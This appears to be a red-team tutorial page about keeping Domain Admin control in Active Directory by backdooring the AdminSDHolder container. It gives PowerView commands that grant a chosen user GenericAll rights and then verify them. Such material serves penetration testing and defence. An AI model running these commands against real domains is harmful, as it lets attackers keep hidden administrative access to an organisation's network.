Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Takeover
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
Active Directory Lab with Hyper-V and PowerShell
ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain Controller Machine Certificate
From Misconfigured Certificate Template to Domain Admin
Shadow Credentials
Abusing Trust Account$: Accessing Resources on a Trusted Domain from a Trusting Domain
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Backdooring AdminSDHolder for Persistence

AdminSDHolder

AdminSDHolder is a special AD container with some "default" security permissions that is used as a template for protected AD accounts and groups (like Domain Admins, Enterprise Admins, etc.) to prevent their accidental and unintended modifications, and to keep them secure.
Once you have agained Domain Admin privileges, AdminSDHolder container can be abused by backdooring it by giving your user GenericAll privileges, which effectively makes that user a Domain Admin.

Execution

Backdooring the AdminSDHolder container by adding an ACL that provides user spotless with GenericAll rights for Domain Admins group:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName spotless -Verbose -Rights All
This is actually what happens to the container - the security ACLs get updated and spotless gets all the privileges:
After 60+ minutes, the changes will propagate automatically, but if you want to force it (if you are testing this in your labs), you can do it via ldp.exe by Modifying DN like so:
Now, confirming that the user spotless has got GenericAll privileges against Domain Admins group:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
We can now hop back to the Domain Admins any time we want to:
In fact, we do not even need to be part of DA group, we still have full access to the DC:

References

Abusing Active Directory Permissions with PowerView - harmj0y
harmj0y
Five common questions about AdminSdHolder and SDProp
docsmsft
Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights
Active Directory Security
Persistence using AdminSDHolder and SDProp
Stealthbits Technologies
Previous
BloodHound with Kali Linux: 101
Next
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Last modified 2yr ago
Copy link
Outline
AdminSDHolder
Execution
References